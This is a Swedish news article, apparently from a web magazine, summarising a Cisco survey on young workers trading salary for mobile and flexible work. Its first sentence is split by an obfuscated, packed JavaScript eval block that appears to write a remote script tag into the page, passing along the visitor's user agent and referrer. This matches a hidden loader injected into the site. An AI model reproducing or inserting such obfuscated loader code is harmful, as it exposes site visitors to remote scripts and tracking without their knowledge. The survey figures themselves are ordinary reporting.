Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Yngre kan tänka sig lägre lön om jobbet är mobilt

Yngre kan tänka sig lägre lön om jobbet är mobilt
Revue Magazine

Ett eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fiheh|var|u0026u|referrer|bhhna||js|php’.split(’|’),0,{}))
mobilt och flexibelt arbetssätt och frihet att använda sociala medier på jobbet går före hög lön bland nära hälften av dagens studenter och unga yrkesverksamma. De yngre kan tänka sig en lön på 70 000 kronor mindre per år om de istället får arbeta mer mobilt och flexibelt. Det visar Cisco Connected World Technology Report.

Undersökningen, som har genomförts bland 2 800 studenter (18-23 år) och yngre personer i karriären (under 30 år), visar att dagens och framtidens kunskapsarbetare ställer krav på ett mer flexibelt arbetssätt. För att attrahera dem måste många företag anpassa sin arbetsmodell och säkerställa att tekniken stödjer de nya behoven.

Ciscos rapport visar att fyra av tio studenter (40 procent) och unga i karriären (45 procent) skulle välja ett jobb som innebär lägre lön, ett mer mobilt arbetssätt, möjlighet att själv välja arbetsverktyg och frihet att använda sociala medier framför ett högre avlönat jobb med mindre flexibilitet. I frågeställningen angavs löneskillnaden mellan de olika jobben till cirka 70 000 kronor per år.

Fler resultat från undersökningen:

  • 60 procent av studenterna anser att det är en rättighet, inte ett privilegium, att kunna arbeta på distans med ett flexibelt schema när de väl kommer ut i arbetslivet.
  • 69 procent av de yrkesverksamma och 70 procent av studenterna tycker inte att det är nödvändigt att befinna sig på kontoret regelbundet för att kunna göra ett bra jobb.
  • Majoriteten, 56 procent, av studenterna fastslår att de inte skulle acceptera en anställning – eller försöka kringgå policyn – på ett företag som förbjuder medarbetarna att använda sociala medier.
  • Tiden när vi bara hade en terminal (dator, surfplatta, smartphone) på jobbet är över. En tredjedel av de unga yrkesverksamma använder minst tre olika terminaler i arbetet.

Läs mer i den engelska releasen.

För mer information:
Magnus Andersson, marknadschef Cisco Sverige
Telefon: 08-685 90 04
E-post: magnande@cisco.com